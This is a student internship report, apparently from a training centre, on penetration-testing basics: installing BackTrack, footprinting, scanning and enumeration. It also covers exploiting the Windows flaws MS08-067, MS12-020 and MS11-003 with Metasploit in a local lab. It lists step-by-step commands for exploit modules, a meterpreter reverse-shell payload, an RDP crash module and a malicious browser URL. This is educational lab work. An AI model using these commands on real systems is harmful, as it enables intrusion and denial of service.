    Page | 7 III.Planning: - Week 1: Receive material and prepare backtrack with windows. Practice with vulnerability ms10_090, ms10_042. - Week 2: Test ms12_004. Find information about ms08_067, ms12_020. Practice with vulnerability ms08_067, ms12_020. - Week 3: Find information about ms11_003. Practice with vulnerability ms11_003. - Week 4: Install and practice with metasploit. RegisterVPS. - Week 5: Test attack from VPS to windows on VMWare of local machine. - Week 6: Try Exploit information from VPS to local machine. - Week 7: Complete systemhacking class. - Week 8: Review and prepare for presentation.
  • 8.
    Page | 8 IV.Internship Activities & Achievements: 1. General information about network security: In july, we known a big problem have appear Viet Hong company has used a software to track everything of mobile phone like contact list, messages, phone calls of who has download the software called Ptracker used to spy customers. In this event happened, about 14,000 mobile have been attacked by this company and lost a lot of essential information. Ptracker will send every information about the user to this company, this company also records the phone call to or from the cell phones and messages which were installed Ptracker. From this event, we can see the importance of security in these days. When technology changes day by day, we must equip ourselves with enough knowledge about security or at least we must know something to make sure that our private information or our secret won’t be stolen by the others. 2. Backtrack: BackTrack was a Linux distribution, superseded by Kali Linux, that focused on security based on the Ubuntu Linux distribution aimed at digital forensics and penetration testing use. In March 2013, the Offensive Security team rebuilt BackTrack around the Debian distribution and released it under the name Kali Linux. The evolution of BackTrack spans many years of development, penetration tests, and unprecedented help from the security community. BackTrack originally started with earlier versions of live Linux distributions called Whoppix, IWHAX, and Auditor. When BackTrack was developed, it was designed to be an all in one live cd used on security audits and was specifically crafted to not leave any remnants of itself
  • 9.
    Page | 9 onthe laptop. It has since expanded to being the most widely adopted penetration testing framework in existence and is used by the security community all over the world.  Install backtrack on VMWare: First, I opened VMWare program and choose create a new virtual machine. After that I follow the step below to create a new backtrack system on unix.
  • 10.
    Page | 10 Inthis backtrack virtual machine I installed it with 20GB memory, 512MB RAM and Network is NAT by use VMnet8. Choose Default Boot Text Mode to continue.
  • 11.
    Page | 11 Waitfor some seconds, this window will appear and I typed startx to open Graphical User Interface. When it starts with GUI choose “install backtrack” it opened the windows as follow picture.
  • 12.
    Page | 12 Tocontinue, I choose language for this backtrack program, time zone, memory, key broad setting and wait for it to install complete the program.
  • 13.
    Page | 13 Untilthis part I can choose install to start install this software. After click install, I have to wait for some time to let the program install complete.
  • 14.
    Page | 14 Whenit run complete this box will appear and click restart to make the computer restart again. When it restarts complete, I can use the basic account root of backtrack to login with user name: root and password: toor. Then start the GUI of backtrack to use by command “startx” . 3. Footprinting: A. Introduction: Footprinting is the first and most convenient way that hackers use to gather information about computer systems and the companies they belong to. The purpose of footprinting to learn as much as you can about a system, it's remote access capabilities, its ports and services, and the aspects of its security. In order to perform a successful hack on a system, it is best to know as much as you can, if not everything, about that system. While there is nary a company in the world that isn't aware of hackers, most companies are now hiring hackers to protect their systems. And since footprinting can be used to attack a system, it can also be used to protect it. If you can find anything out about a system, the company that owns that system, with the right personell, can find out anything they want about you.
  • 15.
    Page | 15 Anattacker will spend 90% of the time in profiling an organization and another 10% in launching the attack 1. Information gathering 2. Determining the network range 3. Identifying active machines 4. Finding open ports and access points 5. OS fingerprinting 6. Fingerprinting services 7. Mapping the network B. Type of footprinting: 1) Active footprinting: Contact directly to the target to seek for information about target like: name, address, owner, network, company, staff,… Contact through email to find everything that can get. This method requires many communication skills and skills to exploit information. 2) Passive footprinting: Different from active footprinting, passive footprinting is also popular. This is a way to collect information through many free sources from the internet instead of contact directly to employees or user of the target organization. For example, we can access to some website provide service to know more information about some domain name or address of website such as www.whoise.net, whoise.domaintools.com, www.tenmien.vn, www.google.com,...
  • 16.
    Page | 16 4.Scanning: If footprinting is the identification of sources of information where the scanning is finding all the gates to get into the information. In the footprinting process, we have reached an IP network range and list the IP addresses through various techniques including query whois and ARIN. This technique gives administrators more security and hacker information contained on the destination network value, IP range, DNS servers and mail servers. In this chapter, we will determine which system is listening on network traffic and can be caught using a variety of tools and techniques such as ping sweeps, port scans. We can easily pass firewall manually (bypass firewalls) to scan the system assuming as it is blocked by the filtering policy criticism (filtering rules). Objects Scanning:  Live System: Determine whether the system that we are targeting with active or do not. Computers are scanning activity on the internet or not. IP address state is left exposed in public.  Port: The next goal is to determine the port is open. The determination of this port allows us to know that computers are open to public services. Since then determine the purpose of attacks.  Operating System: Identifying the operating system is used on the target computer will help hackers find out vulnerabilities common. The operating system is more or less hidden holes enabling hackers hacked. Determine the operating system must determine its version.  Service: Understanding the service is running and listening on the target system. Version of services also contains small errors, but if you know which exploits small, it does not little bit longer.
  • 17.
    Page | 17 IP Address: Not only one of a host IP, we also carefully define address ranges network address, and other relevant host as Default Gateway, DNS Server,… 5. Enumeration: Enumeration is next step in process of finding information of some organizations, occurs after scanning and collection process and analyzing user names, computer names, share resources and services. It also actively queries or binds to target to get the information more reasonable. Enumeration can be defined process of extracting information which got from scanning process into an orderly system. The extracted information includes things related to the objectives to be attacked, such as the user name (user name), the computer name (host name) or services (service), resource sharing (share) listed are those techniques are controlled from inside the environment. Enumeration phase includes connecting to the system and directly extract the information. The aim of the technique is to identify the listed user accounts and system accounts have the ability to use the hack on a target. No need to look for an administrator account so we can increase this up to the account with privileges to allow access to multiple accounts than previously granted. Enumeration is also known as network or vulnerability discovery. It is the act of obtaining information that is readily available from the target's system, applications and networks. It is important to note that the enumeration phase is often the point where the line between an ethical hack and a malicious attack can become blurred as it is often easy to go outside of the boundaries outlined in the original attack plan. In order to construct a picture of an organization's environment, several tools and techniques are available. These tools and techniques include port scanning and
  • 18.
    Page | 18 NMap.Although it is rather simple to collect information, it is rather difficult to determine the value of the information in the hands of a hacker. At first glance, enumeration is simple: take the collected data and evaluate it collectively to establish a plan for more reconnaissance or building a matrix for the vulnerability analysis phase. However, the enumeration phase is where the ethical hacker's ability to make logical deductions plays an enormous role.
  • 19.
    Page | 19 6.MS08-067: MS08-067 is not categorized as virus, worm, Trojan or backdoor. It is a critical vulnerability in the Windows Server Service on Windows 2008/Vista/2003/XP/2000 computers, which allows hackers to gain remote control of the affected computer with the same privileges as the logged on user. The Server Service allows the user's local resources, such as disks and printers, to be shared, so that other users on the network can access them. However, there is a vulnerability because this service does not properly handle specially crafted RPC requests. Remote Procedure Call (RPC) is a protocol used by a program to request a service from a program located on another computer in a network. If exploited successfully, MS08-067 allows hackers to gain remote control of the affected computer with the same privileges as the logged on user. If this user had administrator rights, the hacker could take complete control of the system: create, modify or delete files, install programs, create new user accounts, etc. MS08-067 is usually exploited by sending a specially crafted network packet to a vulnerable system. On Windows Vista and Server 2008 systems, the attacking user must be authenticated.
  • 20.
    Page | 20 Ihave a victim computer and try to gain control of this one. At first, I ping the IP address to make sure that victim computer have connection. Then use nmap command to check the victim computer vulnerable or not. When make sure that it is vulnerable, I start metaslpoit, and search for module.
  • 21.
    Page | 21 Command: Search ms08_067 – to find the module.  Use explioit/windows/smb/ms08_067_netapi – to apply module.  Show options – to see attribute of the module.  Set rhost 192.168.1.131- to specify the target  Set payload window/meterpreter/reverse_tcp - to create the response back  Set lhost 192..168.1.128 – to specify the ip of the attack PC to listen back information of the victim.  Exploit – to execute the module to acttack to the victim.
  • 22.
  • 23.
    Page | 23 . Migrateto keep the connection with the victim computer. I can know the process run on the victim through command “ps” and “sysinfo” can allow me to know about computer information.
  • 24.
    Page | 24 7.MS12_020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution and it only affect the computer which enable the Remote Desktop Protocol (RDP). By default, the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system. This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition. CVE-2012-0002 is an internally reported vulnerability in Microsoft's Remote Desktop Application. Patch for this vulnerability was released on March 13, 2012 as MS12-020. This vulnerability can cause a full system compromise. Failed attempts to exploit this vulnerability can cause a DoS for RDP.
  • 25.
    Page | 25 Thiscontent some following command to exploit:  Msfconsole – to start metasploit.  Search ms12_020 – to find the module use in this test.  Use auxiliary/dos/windows/rdp/ms12_020_maxchannelids – to apply module.  Show options – to show attribute of this module.  Set rhost xxx.xxx.xxx.xxx – this is the command for me to type in the IP address of the target. Ex: set rhost 192.168.1.129 - in this example, 192.168.1.129 is the IP address of the target.  Run (or exploit) – this is the finally command to make the module active, then I get the result as the picture above. The operation system is crash so the computer was attacked and down. Every works were running at that time suddenly stop this will cause a lot of trouble for the user. The way to prevent this is set RDP is not enable.
  • 26.
    Page | 26 8.MS11-003 1. Introduction: Microsoft Internet Explorer have another vulnerability after so many vulnerability have found by security researcher. The MS11_003 vulnerability actually found at February 08, 2011 according to Microsoft security bulletin. This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed. 2. Exploiting Step by Step: To start, I use msfconsole to start metasploit then I use command search ms11_003 to find out the module for vulnerability ms11_003. Type command use exploit/windows/browser/ms11_003_ie_css_import to start the module. Type command set payload/windows/meterpreter/reverse_tcp to create the way for attackers to set the way for the PC to response when they successfully control the victim’s computer. Command show options will allow attacker to see the option they need to fill in.
  • 27.
    Page | 27 Next,the attackers have to set the server host, the listen host, the port and the path so that they can receive the connection from the computer when the virus successfully runs at the computer. Finally, type the command exploit to make the metasploit generate a url from the computer to access.
  • 28.
    Page | 28 Andthis picture, this is the attack success. The attacker transfers the virus to the computer access and gain control from the PC. After that,I can get information by command sysinfo, get user right by getuid,…
  • 29.
    Page | 29 V.Internship Assessment: In the internship, I have learnt more information about some knowledge about security which I can’t found in my school about this program. Backtrack is a collection of tool for people who want to try to know more about security. Every vulnerabilities have appeared in this operation system has been found by many people and these were fixed. However, it doesn’t mean that this error will not happened in our computer even it was known because sometimes the error is not belong to the operation system it belong to the program run on the system that is what I know more about the system when I learn how to use backtrack find out.
  • 30.
    Page | 30 VI.Reference [0] Athena Center internal Material and CDs. [1] http://www.pandasecurity.com/homeusers/security-info/201683/information/MS08-067 [2] https://technet.microsoft.com/en-us/library/security/ms12-020.aspx [3] https://technet.microsoft.com/en-us/library/security/ms08-067.aspx [4] https://technet.microsoft.com/en-us/library/security/ms11-003.aspx [5] http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer- vulnerability-using-metasploit-framework/#sthash.esO69EUT.dpbs